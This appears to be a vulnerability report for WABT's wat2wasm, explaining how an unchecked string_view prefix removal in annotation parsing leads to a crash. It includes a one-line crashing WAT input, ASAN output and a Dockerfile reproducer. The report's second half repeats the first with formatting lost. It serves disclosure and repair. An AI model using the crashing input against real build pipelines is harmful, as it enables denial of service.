Description of the vulnerability and its impact
When wat2wasm processes a WAT file containing a @custom annotation inside a function
body (e.g. @custom "a"), ParseCodeMetadataAnnotation calls name.remove_prefix(14)
on the token text "custom" (6 bytes) without first checking that the name starts with
"metadata.code.". This violates the C++ precondition for std::string_view::remove_prefix,
producing a corrupted string_view with a pointer advanced 14 bytes past the token
allocation and a length of 0xFFFFFFFFFFFFFFF8 (unsigned wraparound). The corrupted
view is stored in a CodeMetadataExpr node and later used as a key in
std::unordered_map<std::string_view, CodeMetadataSection> inside BinaryWriter::WriteExpr,
causing the hash function to attempt a read of ~18 exabytes from an invalid address.
Impact: Deterministic crash (DoS) of any pipeline running wat2wasm --enable-annotations
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.
First faulty condition: src/wast-parser.cc:2314 — name.remove_prefix(sizeof("metadata.code.") - 1) called without a prior starts_with("metadata.code.") guard.
Crash site: src/binary-writer.cc:1189 — BinaryWriter::WriteExpr hashes the corrupted string_view.
How to reproduce
echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null
Crashes deterministically on current HEAD. No special heap layout or environment required.
ASAN output:
==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
#0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
#1 in std::hash<std::string_view>::operator()
#2 in std::unordered_map<std::string_view, ...>::operator[]
#3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr
/build/repo/src/binary-writer.cc:1189
#4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
#5 in BinaryWriter::WriteFunc /build/repo/src/binary-writer.cc:1229
#6 in BinaryWriter::WriteModule /build/repo/src/binary-writer.cc:1737
#7 in wabt::WriteBinaryModule /build/repo/src/binary-writer.cc:1947
#8 in ProgramMain /build/repo/src/tools/wat2wasm.cc:152
For a full end-to-end reproducer this Dockerfile reproduces the issue:
FROM ubuntu:24.04
ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC
RUN apt-get update && apt-get install -y --no-install-recommends \
git \
cmake \
ninja-build \
clang-18 \
llvm-18 \
libclang-rt-18-dev \
python3 \
ca-certificates \
&& rm -rf /var/lib/apt/lists/*
# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
&& cd /build/repo && git log -1 --oneline
# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
cmake -S /build/repo -B /build/repo/build \
-GNinja \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_COMPILER=clang-18 \
-DCMAKE_CXX_COMPILER=clang++-18 \
"-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
"-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
"-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
-DBUILD_TESTS=OFF \
&& ninja -C /build/repo/build wat2wasm
# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat
# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
"echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
echo '' && \
echo '=== ASAN crash ===' && \
ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
/build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]
Which WABT tools or library functions are affected
- Tool:
wat2wasm
- Vulnerable function:
WastParser::ParseCodeMetadataAnnotation — src/wast-parser.cc:2314
- Crash site:
BinaryWriter::WriteExpr — src/binary-writer.cc:1189
Which WebAssembly features must be enabled
--enable-annotations — the crash is only reachable when annotation parsing is
enabled. The @custom token is only accepted under this flag.
Root Cause Analysis
Background
wabt's wat2wasm tool compiles WebAssembly Text Format (WAT) to binary. The --enable-annotations flag activates support for WAT annotations — syntactic extensions of the form (@name ...). One annotation type is metadata.code.*, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix "metadata.code." for this feature to work correctly.
Vulnerable Code
// src/wast-parser.cc:2310 — WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
WABT_TRACE(ParseCodeMetadataAnnotation);
Token tk = Consume();
std::string_view name = tk.text();
name.remove_prefix(sizeof("metadata.code.") - 1); // line 2314 — BUG
std::string data_text;
CHECK_RESULT(ParseQuotedText(&data_text, false));
std::vector<uint8_t> data(data_text.begin(), data_text.end());
exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
EXPECT(Rpar);
return Result::Ok;
}
Plain explanation: The function assumes that any annotation token reaching it begins with the 14-byte prefix "metadata.code." and strips that prefix unconditionally. When the token is "custom" (6 bytes), stripping 14 bytes is undefined behavior — it produces a string_view pointing past the end of the token buffer with a wrapped, near-maximal length.
Precise explanation: sizeof("metadata.code.") - 1 is 14. Calling remove_prefix(14) on a string_view of size 6 advances the internal data_ pointer by 14 bytes (into adjacent heap memory or lexer state) and sets size_ to 6 - 14 = -8, which as size_t is 0xFFFFFFFFFFFFFFF8. The resulting string_view is stored — without copying — into CodeMetadataExpr::name (a std::string_view member). At binary write time, BinaryWriter::WriteExpr uses this as a key in std::unordered_map<std::string_view, CodeMetadataSection>, which hashes the string_view by calling std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8) — a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.
The root cause is the absence of a guard in ParseCodeMetadataAnnotation verifying that the annotation name actually starts with "metadata.code." before calling remove_prefix. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.
Description of the vulnerability and its impact
When
wat2wasmprocesses a WAT file containing a@customannotation inside a functionbody (e.g.
@custom "a"),ParseCodeMetadataAnnotationcallsname.remove_prefix(14)on the token text
"custom"(6 bytes) without first checking that the name starts with"metadata.code.". This violates the C++ precondition forstd::string_view::remove_prefix,producing a corrupted
string_viewwith a pointer advanced 14 bytes past the tokenallocation and a length of
0xFFFFFFFFFFFFFFF8(unsigned wraparound). The corruptedview is stored in a
CodeMetadataExprnode and later used as a key instd::unordered_map<std::string_view, CodeMetadataSection>insideBinaryWriter::WriteExpr,causing the hash function to attempt a read of ~18 exabytes from an invalid address.
Impact: Deterministic crash (DoS) of any pipeline running
wat2wasm --enable-annotationson untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.
First faulty condition:
src/wast-parser.cc:2314—name.remove_prefix(sizeof("metadata.code.") - 1)called without a priorstarts_with("metadata.code.")guard.Crash site:
src/binary-writer.cc:1189—BinaryWriter::WriteExprhashes the corruptedstring_view.How to reproduce
Crashes deterministically on current HEAD. No special heap layout or environment required.
ASAN output:
For a full end-to-end reproducer this Dockerfile reproduces the issue:
Which WABT tools or library functions are affected
wat2wasmWastParser::ParseCodeMetadataAnnotation—src/wast-parser.cc:2314BinaryWriter::WriteExpr—src/binary-writer.cc:1189Which WebAssembly features must be enabled
--enable-annotations— the crash is only reachable when annotation parsing isenabled. The
@customtoken is only accepted under this flag.Root Cause Analysis
Background
wabt's
wat2wasmtool compiles WebAssembly Text Format (WAT) to binary. The--enable-annotationsflag activates support for WAT annotations — syntactic extensions of the form(@name ...). One annotation type ismetadata.code.*, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix"metadata.code."for this feature to work correctly.Vulnerable Code
Plain explanation: The function assumes that any annotation token reaching it begins with the 14-byte prefix
"metadata.code."and strips that prefix unconditionally. When the token is"custom"(6 bytes), stripping 14 bytes is undefined behavior — it produces astring_viewpointing past the end of the token buffer with a wrapped, near-maximal length.Precise explanation:
sizeof("metadata.code.") - 1is14. Callingremove_prefix(14)on astring_viewof size 6 advances the internaldata_pointer by 14 bytes (into adjacent heap memory or lexer state) and setssize_to6 - 14 = -8, which assize_tis0xFFFFFFFFFFFFFFF8. The resultingstring_viewis stored — without copying — intoCodeMetadataExpr::name(astd::string_viewmember). At binary write time,BinaryWriter::WriteExpruses this as a key instd::unordered_map<std::string_view, CodeMetadataSection>, which hashes thestring_viewby callingstd::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8)— a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.The root cause is the absence of a guard in
ParseCodeMetadataAnnotationverifying that the annotation name actually starts with"metadata.code."before callingremove_prefix. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.